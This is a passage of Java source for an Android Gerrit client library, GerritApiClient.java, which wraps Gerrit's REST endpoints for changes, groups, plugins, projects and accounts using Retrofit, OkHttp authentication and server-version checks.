list, @Nullable String base, @Nullable Option downloadCommands) { return withVersionRequestCheck(mService.getChangeEdit( changeId, list, base, downloadCommands)); } @Override public Observable<Void> setChangeEdit( @NonNull String changeId, @NonNull String fileId, @NonNull RequestBody data) { return withVersionRequestCheck(mService.setChangeEdit(changeId, fileId, data)); } @Override public Observable<Void> restoreChangeEdit( @NonNull String changeId, @NonNull RestoreChangeEditInput input) { return withVersionRequestCheck(mService.restoreChangeEdit(changeId, input)); } @Override public Observable<Void> renameChangeEdit( @NonNull String changeId, @NonNull RenameChangeEditInput input) { return withVersionRequestCheck(mService.renameChangeEdit(changeId, input)); } @Override public Observable<Void> newChangeEdit( @NonNull String changeId, @NonNull NewChangeEditInput input) { return withVersionRequestCheck(mService.newChangeEdit(changeId, input)); } @Override public Observable<Void> deleteChangeEditFile(@NonNull String changeId, @NonNull String fileId) { return withVersionRequestCheck(mService.deleteChangeEditFile(changeId, fileId)); } @Override public Observable<Base64Data> getChangeEditFileContent( @NonNull String changeId, @NonNull String fileId, @Nullable String base) { return withVersionRequestCheck(mService.getChangeEditFileContent(changeId, fileId, base)); } @Override public Observable<EditFileInfo> getChangeEditFileMetadata( @NonNull String changeId, @NonNull String fileId) { return withVersionRequestCheck(mService.getChangeEditFileMetadata(changeId, fileId)); } @Override public Observable<String> getChangeEditMessage(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeEditMessage(changeId)); } @Override public Observable<Void> setChangeEditMessage( @NonNull String changeId, @NonNull ChangeEditMessageInput input) { return withVersionRequestCheck(mService.setChangeEditMessage(changeId, input)); } @Override public Observable<Void> publishChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.publishChangeEdit(changeId)); } @Override public Observable<Void> rebaseChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.rebaseChangeEdit(changeId)); } @Override public Observable<Void> deleteChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteChangeEdit(changeId)); } @Override public Observable<List<ReviewerInfo>> getChangeReviewers(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeReviewers(changeId)); } @Override public Observable<List<SuggestedReviewerInfo>> getChangeSuggestedReviewers( @NonNull String changeId, @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck( mService.getChangeSuggestedReviewers(changeId, query, count)); } @Override public Observable<List<ReviewerInfo>> getChangeReviewer( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.getChangeReviewer(changeId, accountId)); } @Override public Observable<AddReviewerResultInfo> addChangeReviewer( @NonNull String changeId, @NonNull ReviewerInput input) { return withVersionRequestCheck(mService.addChangeReviewer(changeId, input)); } @Override public Observable<Void> deleteChangeReviewer( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.deleteChangeReviewer(changeId, accountId)); } @Override public Observable<Map<String, Integer>> getChangeReviewerVotes( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.getChangeReviewerVotes(changeId, accountId)); } @Override public Observable<Void> deleteChangeReviewerVote(@NonNull String changeId, @NonNull String accountId, @NonNull String labelId, @NonNull DeleteVoteInput input) { return withVersionRequestCheck( mService.deleteChangeReviewerVote(changeId, accountId, labelId, input)); } @Override public Observable<CommitInfo> getChangeRevisionCommit( @NonNull String changeId, @NonNull String revisionId, @Nullable Option links) { return withVersionRequestCheck( mService.getChangeRevisionCommit(changeId, revisionId, links)); } @Override public Observable<Map<String, ActionInfo>> getChangeRevisionActions( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionActions(changeId, revisionId)); } @Override public Observable<ChangeInfo> getChangeRevisionReview( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionReview(changeId, revisionId)); } @Override public Observable<ReviewInfo> setChangeRevisionReview(@NonNull String changeId, @NonNull String revisionId, @NonNull ReviewInput input) { return withVersionRequestCheck( mService.setChangeRevisionReview(changeId, revisionId, input)); } @Override public Observable<RelatedChangesInfo> getChangeRevisionRelatedChanges( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck( mService.getChangeRevisionRelatedChanges(changeId, revisionId)); } @Override public Observable<ChangeInfo> rebaseChangeRevision( @NonNull String changeId, @NonNull String revisionId, @NonNull RebaseInput input) { return withVersionRequestCheck(mService.rebaseChangeRevision(changeId, revisionId, input)); } @Override public Observable<SubmitInfo> submitChangeRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.submitChangeRevision(changeId, revisionId)); } @Override public Observable<SubmitInfo> publishChangeDraftRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.publishChangeDraftRevision(changeId, revisionId)); } @Override public Observable<SubmitInfo> deleteChangeDraftRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.deleteChangeDraftRevision(changeId, revisionId)); } @Override public Observable<Base64Data> getChangeRevisionPatch(@NonNull String changeId, @NonNull String revisionId, @Nullable Option zip, @Nullable Option download) { return withVersionRequestCheck( mService.getChangeRevisionPatch(changeId, revisionId, zip, download)); } @Override public Observable<MergeableInfo> getChangeRevisionMergeableStatus(@NonNull String changeId, @NonNull String revisionId, @Nullable Option otherBranches) { return withVersionRequestCheck( mService.getChangeRevisionMergeableStatus(changeId, revisionId, otherBranches)); } @Override public Observable<SubmitType> getChangeRevisionSubmitType( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionSubmitType(changeId, revisionId)); } @Override public Observable<SubmitType> testChangeRevisionSubmitType(@NonNull String changeId, @NonNull String revisionId, @NonNull RuleInput input) { return withVersionRequestCheck( mService.testChangeRevisionSubmitType(changeId, revisionId, input)); } @Override public Observable<List<SubmitRecordInfo>> testChangeRevisionSubmitRule( @NonNull String changeId, @NonNull String revisionId, @NonNull RuleInput input) { return withVersionRequestCheck( mService.testChangeRevisionSubmitRule(changeId, revisionId, input)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeRevisionDrafts( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck( mService.getChangeRevisionDrafts(changeId, revisionId)); } @Override public Observable<CommentInfo> createChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull CommentInput input) { return withVersionRequestCheck( mService.createChangeRevisionDraft(changeId, revisionId, input)); } @Override public Observable<CommentInfo> getChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull String draftId) { return withVersionRequestCheck( mService.getChangeRevisionDraft(changeId, revisionId, draftId)); } @Override public Observable<CommentInfo> updateChangeRevisionDraft(@NonNull String changeId, @NonNull String revisionId, @NonNull String draftId, @NonNull CommentInput input) { return withVersionRequestCheck( mService.updateChangeRevisionDraft(changeId, revisionId, draftId, input)); } @Override public Observable<Void> deleteChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull String draftId) { return withVersionRequestCheck( mService.deleteChangeRevisionDraft(changeId, revisionId, draftId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeRevisionComments( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionComments(changeId, revisionId)); } @Override public Observable<CommentInfo> getChangeRevisionComment(@NonNull String changeId, @NonNull String revisionId, @NonNull String commentId) { return withVersionRequestCheck( mService.getChangeRevisionComment(changeId, revisionId, commentId)); } @Override public Observable<Map<String, FileInfo>> getChangeRevisionFiles( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionFiles(changeId, revisionId)); } @Override public Observable<ResponseBody> getChangeRevisionFileContent(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.getChangeRevisionFileContent(changeId, revisionId, fileId)); } @Override public Observable<ResponseBody> getChangeRevisionFileDownload(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable SuffixMode suffixMode, @Nullable Integer parent) { return withVersionRequestCheck(mService.getChangeRevisionFileDownload( changeId, revisionId, fileId, suffixMode, parent)); } @Override public Observable<DiffInfo> getChangeRevisionFileDiff(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable Integer base, @Nullable Option intraline, @Nullable Option weblinksOnly, @Nullable WhitespaceType whitespace, @Nullable IgnoreWhitespaceType ignoreWhitespace, @Nullable ContextType context) { return withVersionRequestCheck(mService.getChangeRevisionFileDiff(changeId, revisionId, fileId, base, intraline, weblinksOnly, mMediator.resolveWhiteSpaceType(whitespace), mMediator.resolveIgnoreWhiteSpaceType(ignoreWhitespace), context)); } @Override public Observable<BlameInfo> getChangeRevisionFileBlame(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable String base) { return withVersionRequestCheck( mService.getChangeRevisionFileBlame(changeId, revisionId, fileId, base)); } @Override public Observable<Void> setChangeRevisionFileAsReviewed( @NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.setChangeRevisionFileAsReviewed(changeId, revisionId, fileId)); } @Override public Observable<Void> setChangeRevisionFileAsNotReviewed( @NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.setChangeRevisionFileAsNotReviewed(changeId, revisionId, fileId)); } @Override public Observable<ChangeInfo> cherryPickChangeRevision(@NonNull String changeId, @NonNull String revisionId, @NonNull CherryPickInput input) { return withVersionRequestCheck( mService.cherryPickChangeRevision(changeId, revisionId, input)); } // =============================== // Gerrit configuration endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-config.html" // =============================== @Override public Observable<ServerVersion> getServerVersion() { return andCacheVersion(mService.getServerVersion()); } @Override public Observable<ServerInfo> getServerInfo() { return withVersionRequestCheck(mService.getServerInfo()); } @Override public Observable<Void> confirmEmail(@NonNull EmailConfirmationInput input) { return withVersionRequestCheck(mService.confirmEmail(input)); } @Override public Observable<Map<String, CacheInfo>> getServerCaches() { return withVersionRequestCheck(mService.getServerCaches()); } @Override public Observable<Void> executeServerCachesOperations(CacheOperationInput input) { return withVersionRequestCheck(mService.executeServerCachesOperations(input)); } @Override public Observable<CacheInfo> getServerCache(@NonNull String cacheId) { return withVersionRequestCheck(mService.getServerCache(cacheId)); } @Override public Observable<Void> flushServerCache(@NonNull String cacheId) { return withVersionRequestCheck(mService.flushServerCache(cacheId)); } @Override public Observable<SummaryInfo> getServerSummary(@Nullable Option jvm, @Nullable Option gc) { return withVersionRequestCheck(mService.getServerSummary(jvm, gc)); } @Override public Observable<Map<Capability, ServerCapabilityInfo>> getServerCapabilities() { return withVersionRequestCheck(mService.getServerCapabilities()); } @Override public Observable<List<TaskInfo>> getServerTasks() { return withVersionRequestCheck(mService.getServerTasks()); } @Override public Observable<TaskInfo> getServerTask(@NonNull String taskId) { return withVersionRequestCheck(mService.getServerTask(taskId)); } @Override public Observable<Void> deleteServerTask(@NonNull String taskId) { return withVersionRequestCheck(mService.deleteServerTask(taskId)); } @Override public Observable<List<TopMenuEntryInfo>> getServerTopMenus() { return withVersionRequestCheck(mService.getServerTopMenus()); } @Override public Observable<PreferencesInfo> getServerDefaultPreferences() { return withVersionRequestCheck(mService.getServerDefaultPreferences()); } @Override public Observable<PreferencesInfo> setServerDefaultPreferences( @NonNull PreferencesInput input) { return withVersionRequestCheck(mService.setServerDefaultPreferences(input)); } @Override public Observable<DiffPreferencesInfo> getServerDefaultDiffPreferences() { return withVersionRequestCheck(mService.getServerDefaultDiffPreferences()); } @Override public Observable<DiffPreferencesInfo> setServerDefaultDiffPreferences( @NonNull DiffPreferencesInput input) { return withVersionRequestCheck(mService.setServerDefaultDiffPreferences(input)); } // =============================== // Gerrit groups endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-groups.html" // =============================== @Override public Observable<List<GroupInfo>> getGroupSuggestions( @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck(mService.getGroupSuggestions(query, count)); } @Override public Observable<List<GroupInfo>> getGroups( @Nullable GroupQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable String project, @Nullable String user, @Nullable Option owned, @Nullable Option visibleToAll, @Nullable Option verbose, @Nullable List<GroupOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getGroups(query, count, start, project, user, owned, visibleToAll, verbose, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<GroupInfo> getGroup(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroup(groupId)); } @Override public Observable<GroupInfo> createGroup(@NonNull String groupName, @NonNull GroupInput input) { return withVersionRequestCheck(mService.createGroup(groupName, input)); } @Override public Observable<GroupInfo> getGroupDetail(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupDetail(groupId)); } @Override public Observable<String> getGroupName(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupName(groupId)); } @Override public Observable<String> setGroupName(@NonNull String groupId, @NonNull GroupNameInput input) { return withVersionRequestCheck(mService.setGroupName(groupId, input)); } @Override public Observable<String> getGroupDescription(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupDescription(groupId)); } @Override public Observable<String> setGroupDescription( @NonNull String groupId, @NonNull GroupDescriptionInput input) { return withVersionRequestCheck(mService.setGroupDescription(groupId, input)); } @Override public Observable<Void> deleteGroupDescription(@NonNull String groupId) { return withVersionRequestCheck(mService.deleteGroupDescription(groupId)); } @Override public Observable<GroupOptionsInfo> getGroupOptions(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupOptions(groupId)); } @Override public Observable<GroupOptionsInfo> setGroupOptions( @NonNull String groupId, @NonNull GroupOptionsInput input) { return withVersionRequestCheck(mService.setGroupOptions(groupId, input)); } @Override public Observable<GroupInfo> getGroupOwner(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupOwner(groupId)); } @Override public Observable<GroupInfo> setGroupOwner( @NonNull String groupId, @NonNull GroupOwnerInput input) { return withVersionRequestCheck(mService.setGroupOwner(groupId, input)); } @Override public Observable<List<GroupAuditEventInfo>> getGroupAuditLog(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupAuditLog(groupId)); } @Override public Observable<List<AccountInfo>> getGroupMembers( @NonNull String groupId, @Nullable Option recursive) { return withVersionRequestCheck(mService.getGroupMembers(groupId, recursive)); } @Override public Observable<AccountInfo> getGroupMember( @NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.getGroupMember(groupId, accountId)); } @Override public Observable<AccountInfo> addGroupMember( @NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.addGroupMember(groupId, accountId)); } @Override public Observable<List<AccountInfo>> addGroupMembers( @NonNull String groupId, @NonNull MemberInput input) { return withVersionRequestCheck(mService.addGroupMembers(groupId, input)); } @Override public Observable<Void> deleteGroupMember(@NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.deleteGroupMember(groupId, accountId)); } @Override public Observable<Void> deleteGroupMembers( @NonNull String groupId, @NonNull MemberInput input) { return withVersionRequestCheck(mService.deleteGroupMembers(groupId, input)); } @Override public Observable<List<GroupInfo>> getGroupIncludedGroups(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupIncludedGroups(groupId)); } @Override public Observable<GroupInfo> getGroupIncludedGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.getGroupIncludedGroup(groupId, includedGroupId)); } @Override public Observable<GroupInfo> addGroupIncludeGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.addGroupIncludeGroup(groupId, includedGroupId)); } @Override public Observable<GroupInfo> addGroupIncludeGroups( @NonNull String groupId, @NonNull IncludeGroupInput input) { return withVersionRequestCheck(mService.addGroupIncludeGroups(groupId, input)); } @Override public Observable<Void> deleteGroupIncludeGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.deleteGroupIncludeGroup(groupId, includedGroupId)); } @Override public Observable<Void> deleteGroupIncludeGroup( @NonNull String groupId, @NonNull IncludeGroupInput input) { return withVersionRequestCheck(mService.deleteGroupIncludeGroup(groupId, input)); } // =============================== // Gerrit plugins endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-plugins.html" // =============================== @Override public Observable<Map<String, PluginInfo>> getPlugins() { return withVersionRequestCheck(mService.getPlugins()); } @Override public Observable<PluginInfo> installPlugin( @NonNull String pluginId, @NonNull PluginInput input) { return withVersionRequestCheck(mService.installPlugin(pluginId, input)); } @Override public Observable<PluginInfo> getPluginStatus(@NonNull String pluginId) { return withVersionRequestCheck(mService.getPluginStatus(pluginId)); } @Override public Observable<PluginInfo> enablePlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.enablePlugin(pluginId)); } @Override public Observable<PluginInfo> disablePlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.disablePlugin(pluginId)); } @Override public Observable<PluginInfo> reloadPlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.reloadPlugin(pluginId)); } // =============================== // Gerrit projects endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-projects.html" // =============================== @Override public Observable<Map<String, ProjectInfo>> getProjects(@Nullable Option showDescription, @Nullable Option showTree, @Nullable String branch, @Nullable ProjectType type, @Nullable String group) { return withVersionRequestCheck( mService.getProjects(showDescription, showTree, branch, type, group)); } @Override public Observable<ProjectInfo> getProject(@NonNull String projectName) { return withVersionRequestCheck(mService.getProject(projectName)); } @Override public Observable<ProjectInfo> createProject( @NonNull String projectName, @NonNull ProjectInput input) { return withVersionRequestCheck(mService.createProject(projectName, input)); } @Override public Observable<String> getProjectDescription(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectDescription(projectName)); } @Override public Observable<String> setProjectDescription( @NonNull String projectName, @NonNull ProjectDescriptionInput input) { return withVersionRequestCheck(mService.setProjectDescription(projectName, input)); } @Override public Observable<Void> deleteProjectDescription(@NonNull String projectName) { return withVersionRequestCheck(mService.deleteProjectDescription(projectName)); } @Override public Observable<String> getProjectParent(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectParent(projectName)); } @Override public Observable<String> setProjectParent( @NonNull String projectName, @NonNull ProjectParentInput input) { return withVersionRequestCheck(mService.setProjectParent(projectName, input)); } @Override public Observable<String> getProjectHead(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectHead(projectName)); } @Override public Observable<String> setProjectHead( @NonNull String projectName, @NonNull HeadInput input) { return withVersionRequestCheck(mService.setProjectHead(projectName, input)); } @Override public Observable<RepositoryStatisticsInfo> getProjectStatistics(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectStatistics(projectName)); } @Override public Observable<ConfigInfo> getProjectConfig(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectConfig(projectName)); } @Override public Observable<ConfigInfo> setProjectConfig( @NonNull String projectName, @NonNull ConfigInput input) { return withVersionRequestCheck(mService.setProjectConfig(projectName, input)); } @Override public Observable<ResponseBody> runProjectGc(@NonNull String projectName, @NonNull GcInput input) { return withVersionRequestCheck(mService.runProjectGc(projectName, input)); } @Override public Observable<BanResultInfo> banProject( @NonNull String projectName, @NonNull BanInput input) { return withVersionRequestCheck(mService.banProject(projectName, input)); } @Override public Observable<ProjectAccessInfo> getProjectAccessRights(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectAccessRights(projectName)); } @Override public Observable<ProjectAccessInfo> setProjectAccessRights( @NonNull String projectName, @NonNull ProjectAccessInput input) { return withVersionRequestCheck(mService.setProjectAccessRights(projectName, input)); } @Override public Observable<List<BranchInfo>> getProjectBranches(@NonNull String projectName, @Nullable Integer count, @Nullable Integer start, @Nullable String substring, @Nullable String regexp) { return withVersionRequestCheck( mService.getProjectBranches(projectName, count, start, substring, regexp)); } @Override public Observable<BranchInfo> getProjectBranch( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.getProjectBranch(projectName, branchId)); } @Override public Observable<BranchInfo> createProjectBranch( @NonNull String projectName, @NonNull String branchId, @NonNull BranchInput input) { return withVersionRequestCheck(mService.createProjectBranch(projectName, branchId, input)); } @Override public Observable<Void> deleteProjectBranch( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.deleteProjectBranch(projectName, branchId)); } @Override public Observable<Void> deleteProjectBranches( @NonNull String projectName, @NonNull DeleteBranchesInput input) { return withVersionRequestCheck(mService.deleteProjectBranches(projectName, input)); } @Override public Observable<Base64Data> getProjectBranchFileContent( @NonNull String projectName, @NonNull String branchId, @NonNull String fileId) { return withVersionRequestCheck( mService.getProjectBranchFileContent(projectName, branchId, fileId)); } @Override public Observable<MergeableInfo> getProjectBranchMergeableStatus(@NonNull String projectName, @NonNull String branchId, @NonNull String sourceBranchId, @Nullable MergeStrategy strategy) { return withVersionRequestCheck(mService.getProjectBranchMergeableStatus( projectName, branchId, sourceBranchId, strategy)); } @Override public Observable<List<ReflogEntryInfo>> getProjectBranchReflog( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.getProjectBranchReflog(projectName, branchId)); } @Override public Observable<List<ProjectInfo>> getProjectChildProjects(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectChildProjects(projectName)); } @Override public Observable<ProjectInfo> getProjectChildProject( @NonNull String projectName, @NonNull String childProjectName) { return withVersionRequestCheck( mService.getProjectChildProject(projectName, childProjectName)); } @Override public Observable<List<TagInfo>> getProjectTags(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectTags(projectName)); } @Override public Observable<TagInfo> getProjectTag(@NonNull String projectName, @NonNull String tagId) { return withVersionRequestCheck(mService.getProjectTag(projectName, tagId)); } @Override public Observable<TagInfo> createProjectTag( @NonNull String projectName, @NonNull String tagId, @NonNull TagInput input) { return withVersionRequestCheck(mService.createProjectTag(projectName, tagId, input)); } @Override public Observable<CommitInfo> getProjectCommit( @NonNull String projectName, @NonNull String commitId) { return withVersionRequestCheck(mService.getProjectCommit(projectName, commitId)); } @Override public Observable<Base64Data> getProjectCommitFileContent( @NonNull String projectName, @NonNull String commitId, @NonNull String fileId) { return withVersionRequestCheck( mService.getProjectCommitFileContent(projectName, commitId, fileId)); } @Override public Observable<List<DashboardInfo>> getProjectDashboards(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectDashboards(projectName)); } @Override public Observable<DashboardInfo> getProjectDashboard( @NonNull String projectName, @NonNull String dashboardId) { return withVersionRequestCheck(mService.getProjectDashboard(projectName, dashboardId)); } @Override public Observable<DashboardInfo> setProjectDashboard(@NonNull String projectName, @NonNull String dashboardId, @NonNull DashboardInput input) { return withVersionRequestCheck( mService.setProjectDashboard(projectName, dashboardId, input)); } @Override public Observable<Void> deleteProjectDashboard( @NonNull String projectName, @NonNull String dashboardId) { return withVersionRequestCheck(mService.deleteProjectDashboard(projectName, dashboardId)); } }
gerrit/src/main/java/com/ruesga/rview/gerrit/GerritApiClient.java
/* * Copyright (C) 2016 Jorge Ruesga * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.ruesga.rview.gerrit; import android.net.Uri; import android.support.annotation.NonNull; import android.support.annotation.Nullable; import com.burgstaller.okhttp.AuthenticationCacheInterceptor; import com.burgstaller.okhttp.CachingAuthenticatorDecorator; import com.burgstaller.okhttp.DispatchingAuthenticator; import com.burgstaller.okhttp.basic.BasicAuthenticator; import com.burgstaller.okhttp.digest.CachingAuthenticator; import com.burgstaller.okhttp.digest.Credentials; import com.burgstaller.okhttp.digest.DigestAuthenticator; import com.google.gson.annotations.Since; import com.ruesga.rview.gerrit.filter.AccountQuery; import com.ruesga.rview.gerrit.filter.ChangeQuery; import com.ruesga.rview.gerrit.filter.GroupQuery; import com.ruesga.rview.gerrit.filter.Option; import com.ruesga.rview.gerrit.model.*; import java.util.ArrayList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; import okhttp3.Interceptor; import okhttp3.OkHttpClient; import okhttp3.Request; import okhttp3.RequestBody; import okhttp3.ResponseBody; import okhttp3.logging.HttpLoggingInterceptor; import retrofit2.Retrofit; import retrofit2.adapter.rxjava.RxJavaCallAdapterFactory; import retrofit2.converter.gson.GsonConverterFactory; import rx.Observable; public class GerritApiClient implements GerritApi { private final String mEndPoint; private final GerritApi mService; private final PlatformAbstractionLayer mAbstractionLayer; protected ServerVersion mServerVersion; private final ApiVersionMediator mMediator = new ApiVersionMediator() { @Override public WhitespaceType resolveWhiteSpaceType(WhitespaceType type) { if (mServerVersion.getVersion() < 2.12) { return null; } return type; } @Override public IgnoreWhitespaceType resolveIgnoreWhiteSpaceType(IgnoreWhitespaceType type) { if (mServerVersion.getVersion() >= 2.12) { return null; } return type; } }; public GerritApiClient(String endpoint, Authorization authorization, PlatformAbstractionLayer abstractionLayer) { mAbstractionLayer = abstractionLayer; mEndPoint = endpoint; DispatchingAuthenticator authenticator = null; if (authorization != null && !authorization.isAnonymousUser()) { final Credentials credentials = new Credentials( authorization.mUsername, authorization.mPassword); final BasicAuthenticator basicAuthenticator = new BasicAuthenticator(credentials); final DigestAuthenticator digestAuthenticator = new DigestAuthenticator(credentials); authenticator = new DispatchingAuthenticator.Builder() .with("digest", digestAuthenticator) .with("basic", basicAuthenticator) .build(); } // OkHttp client OkHttpClient.Builder clientBuilder = OkHttpHelper.getSafeClientBuilder(); clientBuilder.followRedirects(true) .readTimeout(60000, java.util.concurrent.TimeUnit.MILLISECONDS) .followSslRedirects(true) .addInterceptor(createConnectivityCheckInterceptor()) .addInterceptor(createLoggingInterceptor()) .addInterceptor(createHeadersInterceptor()); if (authorization != null && !authorization.isAnonymousUser()) { final Map<String, CachingAuthenticator> authCache = new ConcurrentHashMap<>(); clientBuilder .authenticator(new CachingAuthenticatorDecorator(authenticator, authCache)) .addInterceptor(new AuthenticationCacheInterceptor(authCache)); } OkHttpClient client = clientBuilder.build(); // Gson adapter GsonConverterFactory gsonFactory = GsonConverterFactory.create( GsonHelper.createGerritGsonBuilder(true, mAbstractionLayer).create()); // RxJava adapter RxJavaCallAdapterFactory rxAdapter = RxJavaCallAdapterFactory.create(); // Retrofit Retrofit retrofit = new Retrofit.Builder() .baseUrl(endpoint) .client(client) .addConverterFactory(gsonFactory) .addCallAdapterFactory(rxAdapter) .build(); // Build the api mService = retrofit.create(GerritApi.class); } private HttpLoggingInterceptor createLoggingInterceptor() { HttpLoggingInterceptor logging = new HttpLoggingInterceptor(mAbstractionLayer::log); logging.setLevel(mAbstractionLayer.isDebugBuild() ? HttpLoggingInterceptor.Level.BODY : HttpLoggingInterceptor.Level.BASIC); return logging; } private Interceptor createHeadersInterceptor() { return chain -> { Request original = chain.request(); Request.Builder requestBuilder = original.newBuilder(); if (!mAbstractionLayer.isDebugBuild()) { requestBuilder.header("Accept", "application/json"); } Request request = requestBuilder.build(); return chain.proceed(request); }; } private Interceptor createConnectivityCheckInterceptor() { return chain -> { if (!mAbstractionLayer.hasConnectivity()) { throw new NoConnectivityException(); } return chain.proceed(chain.request()); }; } private <T> Observable<T> withVersionRequestCheck(final Observable<T> observable) { return Observable.fromCallable(() -> { if (mServerVersion == null) { mServerVersion = getServerVersion().toBlocking().first(); } return observable.toBlocking().first(); }); } private Observable<ServerVersion> andCacheVersion(final Observable<ServerVersion> observable) { return Observable.fromCallable(() -> { mServerVersion = observable.toBlocking().first(); return mServerVersion; }); } @SuppressWarnings("unchecked") private <T> List<T> filterByVersion(List<T> o) { if (o == null) { return null; } if (mServerVersion == null) { mServerVersion = getServerVersion().toBlocking().first(); } ArrayList<T> filter = new ArrayList<>(o.size()); for (T t : o) { boolean isSupported = true; try { Since a = t.getClass().getDeclaredField(t.toString()).getAnnotation(Since.class); if (a != null && a.value() > mServerVersion.getVersion()) { isSupported = false; } } catch (Exception e) { // Ignore } if (isSupported) { filter.add(t); } } return filter; } // =============================== // Non-Api operations // =============================== private String toUnauthenticatedEndpoint(String endPoint) { return endPoint.endsWith("/a/") ? endPoint.substring(0, endPoint.length() - 2) : endPoint; } @Override public Uri getChangeUri(@NonNull String changeId) { return Uri.parse(String.format(Locale.US, "%s#/c/%s", toUnauthenticatedEndpoint(mEndPoint), changeId)); } @Override public Uri getRevisionUri(@NonNull String changeId, @NonNull String revisionNumber) { return Uri.parse(String.format(Locale.US, "%s#/c/%s/%s", toUnauthenticatedEndpoint(mEndPoint), changeId, revisionNumber)); } @Override public Uri getDownloadRevisionUri( @NonNull String changeId, @NonNull String revisionId, @NonNull DownloadFormat format) { return Uri.parse(String.format(Locale.US, "%schanges/%s/revisions/%s/archive?format=%s", toUnauthenticatedEndpoint(mEndPoint), changeId, revisionId, format.toString().toLowerCase())); } @Override public ApiVersionMediator getApiVersionMediator() { return mMediator; } // =============================== // Gerrit access endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-access.html" // =============================== @Override public Observable<Map<String, ProjectAccessInfo>> getAccessRights(@NonNull String[] names) { return withVersionRequestCheck(mService.getAccessRights(names)); } // =============================== // Gerrit accounts endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-accounts.html" // =============================== @Override public Observable<List<AccountInfo>> getAccountsSuggestions( @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck(mService.getAccountsSuggestions(query, count)); } @Override public Observable<List<AccountInfo>> getAccounts( @NonNull AccountQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable List<AccountOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getAccounts(query, count, start, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<AccountInfo> getAccount(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccount(accountId)); } @Override public 